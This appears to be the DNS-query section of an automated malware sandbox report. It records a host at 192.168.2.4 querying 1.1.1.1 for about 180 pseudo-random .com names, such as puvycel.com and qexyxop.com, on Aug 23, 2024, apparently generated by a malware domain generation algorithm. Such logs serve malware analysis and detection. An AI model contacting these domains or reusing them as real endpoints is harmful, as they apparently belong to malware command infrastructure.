                                                                                                                                                                                                              Aug 23, 2024 18:47:48.762491941 CEST192.168.2.41.1.1.10x5628Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.763292074 CEST192.168.2.41.1.1.10xf53fStandard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.764008999 CEST192.168.2.41.1.1.10xaac2Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.764359951 CEST192.168.2.41.1.1.10xb92eStandard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.764621019 CEST192.168.2.41.1.1.10x2602Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.765255928 CEST192.168.2.41.1.1.10xa28Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.765280962 CEST192.168.2.41.1.1.10xfa69Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.765561104 CEST192.168.2.41.1.1.10xd995Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.765862942 CEST192.168.2.41.1.1.10x9139Standard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.766154051 CEST192.168.2.41.1.1.10x9ee3Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.766424894 CEST192.168.2.41.1.1.10x1129Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.767010927 CEST192.168.2.41.1.1.10x7ed7Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.767010927 CEST192.168.2.41.1.1.10x99b5Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.767755985 CEST192.168.2.41.1.1.10xc48aStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.767755985 CEST192.168.2.41.1.1.10x5ccbStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.768424988 CEST192.168.2.41.1.1.10xac58Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.768474102 CEST192.168.2.41.1.1.10xc748Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.768578053 CEST192.168.2.41.1.1.10x9c1fStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.769190073 CEST192.168.2.41.1.1.10x4894Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.769206047 CEST192.168.2.41.1.1.10x9d62Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.769382954 CEST192.168.2.41.1.1.10x7e78Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.769893885 CEST192.168.2.41.1.1.10x263bStandard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.769927979 CEST192.168.2.41.1.1.10x521dStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.770108938 CEST192.168.2.41.1.1.10x843bStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.770716906 CEST192.168.2.41.1.1.10xbbb9Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.770773888 CEST192.168.2.41.1.1.10x48ccStandard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.771053076 CEST192.168.2.41.1.1.10x947Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.771543026 CEST192.168.2.41.1.1.10xc098Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.771568060 CEST192.168.2.41.1.1.10xc6e1Standard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.771784067 CEST192.168.2.41.1.1.10xb0a7Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.772506952 CEST192.168.2.41.1.1.10xbf95Standard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.772785902 CEST192.168.2.41.1.1.10xd3b3Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.772963047 CEST192.168.2.41.1.1.10x59f6Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.774626970 CEST192.168.2.41.1.1.10x5ec3Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.775896072 CEST192.168.2.41.1.1.10x64c2Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.776094913 CEST192.168.2.41.1.1.10xf044Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.776237965 CEST192.168.2.41.1.1.10x505bStandard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.776443005 CEST192.168.2.41.1.1.10x5256Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.776616096 CEST192.168.2.41.1.1.10x9c6fStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.776755095 CEST192.168.2.41.1.1.10x4128Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.776902914 CEST192.168.2.41.1.1.10x2a9aStandard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.777041912 CEST192.168.2.41.1.1.10xe09Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.777198076 CEST192.168.2.41.1.1.10xe80cStandard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.777339935 CEST192.168.2.41.1.1.10xe718Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.777621984 CEST192.168.2.41.1.1.10x2ee2Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.777908087 CEST192.168.2.41.1.1.10x91f8Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.778331041 CEST192.168.2.41.1.1.10x601dStandard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.779006958 CEST192.168.2.41.1.1.10xce57Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.779366016 CEST192.168.2.41.1.1.10x8c9dStandard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.779788017 CEST192.168.2.41.1.1.10xb7dcStandard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.780311108 CEST192.168.2.41.1.1.10xa351Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.780651093 CEST192.168.2.41.1.1.10x1babStandard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.780792952 CEST192.168.2.41.1.1.10xdeaStandard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.781002045 CEST192.168.2.41.1.1.10xa367Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.781198025 CEST192.168.2.41.1.1.10xe81dStandard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.781388998 CEST192.168.2.41.1.1.10xf921Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.781620979 CEST192.168.2.41.1.1.10xd212Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.781620979 CEST192.168.2.41.1.1.10xeeb6Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.781811953 CEST192.168.2.41.1.1.10x5734Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.782308102 CEST192.168.2.41.1.1.10x6b42Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.782326937 CEST192.168.2.41.1.1.10xfaa5Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.782505035 CEST192.168.2.41.1.1.10xdbb9Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.782649994 CEST192.168.2.41.1.1.10xe9b4Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.782813072 CEST192.168.2.41.1.1.10xeb8eStandard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.949002028 CEST192.168.2.41.1.1.10xcf5dStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.949605942 CEST192.168.2.41.1.1.10x14c7Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.950565100 CEST192.168.2.41.1.1.10x3664Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.951314926 CEST192.168.2.41.1.1.10xa4c8Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.952009916 CEST192.168.2.41.1.1.10xa2fcStandard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.952671051 CEST192.168.2.41.1.1.10xb413Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.953289032 CEST192.168.2.41.1.1.10x1692Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.954134941 CEST192.168.2.41.1.1.10x4101Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.954788923 CEST192.168.2.41.1.1.10x7cb2Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.955319881 CEST192.168.2.41.1.1.10xee7eStandard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.956000090 CEST192.168.2.41.1.1.10x2f75Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.956612110 CEST192.168.2.41.1.1.10x4c68Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.957181931 CEST192.168.2.41.1.1.10xfed2Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.957495928 CEST192.168.2.41.1.1.10x13c8Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.957858086 CEST192.168.2.41.1.1.10xf62Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.958198071 CEST192.168.2.41.1.1.10x39a2Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.958504915 CEST192.168.2.41.1.1.10xabcStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.958556890 CEST192.168.2.41.1.1.10xd9fcStandard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.959089994 CEST192.168.2.41.1.1.10x5ac6Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.959460020 CEST192.168.2.41.1.1.10xcaa9Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.959742069 CEST192.168.2.41.1.1.10x7625Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.960091114 CEST192.168.2.41.1.1.10x5df7Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.960392952 CEST192.168.2.41.1.1.10x9a8cStandard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.960921049 CEST192.168.2.41.1.1.10xffafStandard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.960958958 CEST192.168.2.41.1.1.10x5d0dStandard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.961649895 CEST192.168.2.41.1.1.10x8287Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.961910963 CEST192.168.2.41.1.1.10xd937Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.962023020 CEST192.168.2.41.1.1.10x8a7Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.962491035 CEST192.168.2.41.1.1.10xcfa2Standard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.962867975 CEST192.168.2.41.1.1.10xdc63Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.962887049 CEST192.168.2.41.1.1.10x1a7dStandard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.963443041 CEST192.168.2.41.1.1.10x6f25Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.963726044 CEST192.168.2.41.1.1.10x1946Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.963758945 CEST192.168.2.41.1.1.10xa19aStandard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.964360952 CEST192.168.2.41.1.1.10x43f5Standard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.964999914 CEST192.168.2.41.1.1.10x226dStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.965142012 CEST192.168.2.41.1.1.10x77beStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.965738058 CEST192.168.2.41.1.1.10x464bStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.966201067 CEST192.168.2.41.1.1.10xb445Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.966346025 CEST192.168.2.41.1.1.10x856dStandard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.966787100 CEST192.168.2.41.1.1.10x1a47Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.967387915 CEST192.168.2.41.1.1.10x88c0Standard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.967741013 CEST192.168.2.41.1.1.10x74c7Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.968585968 CEST192.168.2.41.1.1.10x5f23Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.972105026 CEST192.168.2.41.1.1.10x4fcbStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.972373009 CEST192.168.2.41.1.1.10x4242Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.972531080 CEST192.168.2.41.1.1.10x192bStandard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.972687960 CEST192.168.2.41.1.1.10x231fStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.972909927 CEST192.168.2.41.1.1.10x2ec2Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.973041058 CEST192.168.2.41.1.1.10xdd20Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.973187923 CEST192.168.2.41.1.1.10x5e11Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.973326921 CEST192.168.2.41.1.1.10x79eaStandard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.973462105 CEST192.168.2.41.1.1.10x4771Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.973586082 CEST192.168.2.41.1.1.10x9003Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.973789930 CEST192.168.2.41.1.1.10xf9efStandard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.973975897 CEST192.168.2.41.1.1.10x119cStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.974117041 CEST192.168.2.41.1.1.10x3b9Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.974263906 CEST192.168.2.41.1.1.10x34aStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.974407911 CEST192.168.2.41.1.1.10x8139Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.974549055 CEST192.168.2.41.1.1.10x47b9Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.975440025 CEST192.168.2.41.1.1.10x86f3Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.975718975 CEST192.168.2.41.1.1.10x7e8aStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.976146936 CEST192.168.2.41.1.1.10xbb13Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.976511955 CEST192.168.2.41.1.1.10xf49fStandard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.200262070 CEST192.168.2.41.1.1.10x2d9aStandard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.949608088 CEST192.168.2.41.1.1.10x2142Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.950603008 CEST192.168.2.41.1.1.10x3933Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.951076031 CEST192.168.2.41.1.1.10x3c91Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.951270103 CEST192.168.2.41.1.1.10x9223Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.951514959 CEST192.168.2.41.1.1.10x7a82Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.951873064 CEST192.168.2.41.1.1.10x3ce8Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.952397108 CEST192.168.2.41.1.1.10x7098Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.952439070 CEST192.168.2.41.1.1.10x2cc3Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.952972889 CEST192.168.2.41.1.1.10xa7c0Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.953021049 CEST192.168.2.41.1.1.10x680cStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.953521967 CEST192.168.2.41.1.1.10xad57Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.953836918 CEST192.168.2.41.1.1.10xf3e7Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.954293966 CEST192.168.2.41.1.1.10x9a7bStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.954729080 CEST192.168.2.41.1.1.10x766fStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.955136061 CEST192.168.2.41.1.1.10x8534Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.955168962 CEST192.168.2.41.1.1.10xf6d6Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.955737114 CEST192.168.2.41.1.1.10xec45Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.955826044 CEST192.168.2.41.1.1.10xea7fStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.956258059 CEST192.168.2.41.1.1.10x325fStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.956258059 CEST192.168.2.41.1.1.10x10d7Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.956723928 CEST192.168.2.41.1.1.10x8ca2Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.956989050 CEST192.168.2.41.1.1.10xe8e6Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.957094908 CEST192.168.2.41.1.1.10x7b2cStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.957623959 CEST192.168.2.41.1.1.10x2364Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.957660913 CEST192.168.2.41.1.1.10xf1aaStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.958123922 CEST192.168.2.41.1.1.10x7784Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.958550930 CEST192.168.2.41.1.1.10x77aeStandard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.958601952 CEST192.168.2.41.1.1.10xd2cfStandard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.959253073 CEST192.168.2.41.1.1.10xf5b4Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.959569931 CEST192.168.2.41.1.1.10x3e27Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.959821939 CEST192.168.2.41.1.1.10xbd96Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.959922075 CEST192.168.2.41.1.1.10x75f7Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.960673094 CEST192.168.2.41.1.1.10x3c9dStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.961249113 CEST192.168.2.41.1.1.10xc512Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.961597919 CEST192.168.2.41.1.1.10xcd7cStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.961663008 CEST192.168.2.41.1.1.10x765dStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.962866068 CEST192.168.2.41.1.1.10xee4fStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.963558912 CEST192.168.2.41.1.1.10x5eeStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.963957071 CEST192.168.2.41.1.1.10x28deStandard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.964076996 CEST192.168.2.41.1.1.10x75f2Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.966433048 CEST192.168.2.41.1.1.10xc69bStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.966466904 CEST192.168.2.41.1.1.10xad6bStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.966850042 CEST192.168.2.41.1.1.10x86bStandard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.968441010 CEST192.168.2.41.1.1.10xbdb7Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.968756914 CEST192.168.2.41.1.1.10x832aStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.970088005 CEST192.168.2.41.1.1.10x8bb2Standard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.971486092 CEST192.168.2.41.1.1.10xaba9Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.972112894 CEST192.168.2.41.1.1.10xe829Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.972151041 CEST192.168.2.41.1.1.10x244Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.972475052 CEST192.168.2.41.1.1.10xfa0aStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.972544909 CEST192.168.2.41.1.1.10xd6ceStandard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.973742008 CEST192.168.2.41.1.1.10x11f4Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
